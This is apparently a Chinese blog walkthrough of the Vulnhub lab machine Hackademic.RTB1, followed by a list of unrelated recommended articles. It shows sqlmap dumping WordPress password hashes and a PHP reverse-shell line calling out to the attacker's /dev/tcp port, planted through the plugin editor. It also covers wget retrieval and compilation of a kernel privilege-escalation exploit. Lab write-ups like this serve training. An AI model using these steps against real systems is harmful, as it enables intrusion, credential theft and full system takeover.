Vulnhub系列靶机-Hackadmeic.RTB1

2023-09-17 19:13:15

Vulnhub系列靶机-Hackadmeic.RTB1

1. 信息收集

1.1 主机扫描

arp-scan -l

image-20230910123002137

1.2 端口扫描

nmap -A -p- 192.168.188.184

image-20230910123759565

扫描到了22端口和80端口,但是22端口的关闭的。

访问Web页面。

image-20230910123616182

使用浏览器插件Wappalyzer扫描网站

image-20230910123707794

看到WordPress,数据库是MySQL,语言是PHP。

根据首页中显示的内容,点击target

image-20230910124238518

页面提示告诉我们要读取root目录下的Key.txt文件。

image-20230910124307870

1.3 目录爆破

爆破/Hackademic_RTB1/网页目录

dirsearch -u http://192.168.188.184/Hackademic_RTB1/ -e * -i 200

image-20230910124525063

观察发现有一个登录页面wp-login.php。

2. 漏洞探测

在点击页面中能点击的链接的时候,发现点击Uncategorized的时候,链接变成了

http://192.168.188.184/Hackademic_RTB1/?cat=1

image-20230910124640071

尝试是否存在SQL注入,在?cat=1后加上',发现有SQL语句的报错信息,可以判断有SQL注入漏洞。

image-20230910124747474

3. 漏洞利用

使用SqlMap工具进行SQL注入。

查看数据库

sqlmap -u "192.168.188.184/Hackademic_RTB1/?cat=1" --dbs --batch 

image-20230910125123842

查看数据库中有哪些表

sqlmap -u "192.168.188.184/Hackademic_RTB1/?cat=1" -D "wordpress" -tables --batch

image-20230910125306585

查看wp_users表中字段

sqlmap -u "192.168.188.184/Hackademic_RTB1/?cat=1" -D "wordpress" -T "wp_users" -columns --batch

image-20230910125441481

这里我们只关注user_login和user_pass字段。

获取字段信息

sqlmap -u "192.168.188.184/Hackademic_RTB1/?cat=1" -D "wordpress" -T "wp_users" -columns -C "user_login,user_pass" -dump --batch

image-20230910125648902

这里直接使用第三个用户名和密码进行登录,其他账户通过查看都没有什么可靠的信息。

image-20230910130217124

发现在Plugins选项里有一个Plugin Editor编辑的地址。可以产生过添加反弹shell。

3.1 反弹Shell

system("bash -c 'sh -i &>/dev/tcp/192.168.188.157/8888 0>&1'");

image-20230910132406678

kali中开启监听

nc -lnvp 8888

image-20230910130517734

提交之后,需要获取到上传的路径,才可以触发反弹shell。

之前我们使用网页插件扫描网页的时候得知了网站使用的是WordPress,Wordpress上传的文件默认是存储在目录/wp-content/uploads中,Uploads文件夹中包括所有上传的图片,视频和附件。

并且在爆破目录的时候发现有一个wp-content目录,尝试进行访问。(这里就存在目录遍历漏洞)

image-20230910130850517

刚才我们编辑的页面是在Plugins选项中的Plugin Editor下的hello.php。点击pluguns进行查看。

image-20230910131104899

点击hello.php后触发反弹shell

image-20230910132519556

4. 内核提权

查看内核版本

uname -a

image-20230910132621342

搜索系统内核版本漏洞

searchsploit 2.6.3 | grep "Local Privilege Escalation"

image-20230910132944564

查看完整路径

searchsploit -p linux/local/15285.c 

image-20230910133028252

/usr/share/exploitdb/exploits/linux/local/15285.c

将15285.c文件拷贝到桌面上,然后在桌面上开启一个http服务

python3 -m http.server 9999

image-20230910133601577

然后切换到tmp目录,执行wget命令下载该工具

wget http://192.168.188.157:9999/15285.c

image-20230910133819689

然后赋予该文件可执行权限

chmod 777 15285.c

image-20230910134031572

将15285.c进行预处理,汇编,编译,并链接形成可执行文件exp。-o选项用来指定输出文件的文件名

image-20230910134327352

执行exp文件

image-20230910134416263

查看key.txt文件。

image-20230910134545165

更多推荐

ARM架构过程调用标准AAPCS(学习)

AAPCS是ARM架构的处理器规定的一些标准。参数和返回值传递,对于简单的情况,输入参数由R0-R3分别用来记录第1到4个参数。当传递的参数超过4个时,就需要借助栈来保存参数。函数的返回值通常保存在R0中,若返回值为64位,R1也用来保存返回值。函数调用中的寄存器用法。函数或子程序应该保持R4-R11、R13和R14的

Vue学习笔记总结

目录1、Vue核心1.1什么是vue?1.2什么是mvvm?​编辑1.3插值表达式{{}}2.Vue中的常用指令2.1内容渲染指令2.2条件渲染指令2.3事件绑定指令2.4属性绑定指令2.5列表渲染指令2.5.1小案例-小黑的书架2.6v-for中的key2.7双向绑定指令3.指令修饰符3.1什么是指令修饰符?3.2按

esbuild中文文档-基础配置项(General options - Tsconfig、Tsconfig raw)

文章目录TsconfigTsconfigraw结语哈喽,大家好!我是「励志前端小黑哥」,我带着最新发布的文章又来了!老规矩,小手动起来~点赞关注不迷路!esbuild简单介绍esbuild为了突破了JavaScript语言的瓶颈,采用了Go语言编写,构建速度与同代码量下的webpack对比提升在10倍以上,开创了构建工

(并查集) 1971. 寻找图中是否存在路径 ——【Leetcode每日一题】

❓1971.寻找图中是否存在路径难度:简单有一个具有n个顶点的双向图,其中每个顶点标记从0到n-1(包含0和n-1)。图中的边用一个二维整数数组edges表示,其中edges[i]=[ui,vi]表示顶点ui和顶点vi之间的双向边。每个顶点对由最多一条边连接,并且没有顶点存在与自身相连的边。请你确定是否存在从顶点sou

为何学linux及用处

目前企业使用的操作系统无非就是国产类的,windows和linux类。我们要提升自己的技能,需要学习这两款。我记得在大学时期,学习过windows以及linux,但当时觉得又不常用,就学的模棱两可。毕业之后,你会发现,其实这两种操作系统是很主流的。为什么学?下面就是一些工作中遇到的例子分享一下。我记得在企业中有次遇到数

一款固定资产设备管理系统、对常用资产设备进行信息化管理

一、开源项目简介EAM固定资产设备管理系统,满足中小企业基本需求,对常用资产设备进行信息化管理,包含自定义支持各类设备、自带导入导出、维护工作统计、采购管理、文档管理、合同管理等功能。实现企业对资产的基本管理,包含对资产的登记、维修、调拨、转移等基本功能的支持,并提供对资产的耗材、库存进行管理,有完善的组织架构,非常适

2023/09/17

文章目录1.vscode展开所有代码快捷键ctrl+k+j2.git删除所有stash或指定stashgitstashdrop[可选stash名]3.vue在函数默认参数后增加新参数4.gitpush添加“-u”参数5.vscode快捷输入符号$的使用6.WebGL之什么是GLB&GLTF文件?7.WebGL之什么是H

Appium混合页面点击方法tap的使用

原生应用开发,是在Android、IOS等移动平台上利用官方提供的开发语言、开发类库、开发工具进行App开发;HTML5(h5)应用开发,是利用Web技术进行的App开发。目前,市面上很多app都是原生和h5混合开发,这样做的好处在于:1)开发效率高,节约时间同一套代码Android和IOS基本都可用。2)更新和部署比

SpringMVC之JSON返回及异常处理

目录JSON处理导入依赖配置Spring-mvc.xml@ResponseBody注解使用测试目录JSON处理导入依赖配置Spring-mvc.xml@ResponseBody注解使用测试Jackson定义用法常用注解统一异常处理为什么要全局异常处理?异常处理思路SpringMVC异常分类综合案例异常处理方式一异常处理

Call短路触发版本SIP对讲求助终端

SV-2701VPCall短路触发版本SIP对讲求助终端一、描述SV-2701VP是我司的一款壁挂式求助对讲终端,具有10/100M以太网接口,支持G.711与G.722音频解码,其接收SIP网络的音频数据,实时解码播放。配置一路线路输入,一路线路输出,可将内部音源输出到外接功放,还有Mic输入,一路继电器输出和一路呼

Python 3.11的10个高效新特性

1、模式匹配Python3.11引入了模式匹配,可以简化复杂的条件逻辑。下面是一个使用模式匹配来处理不同类型数据结构的例子:defprocess_data(data):matchdata:case0:print("Receivedzero")case[x,y]:print(f"Receivedalist:{x},{y}

热文推荐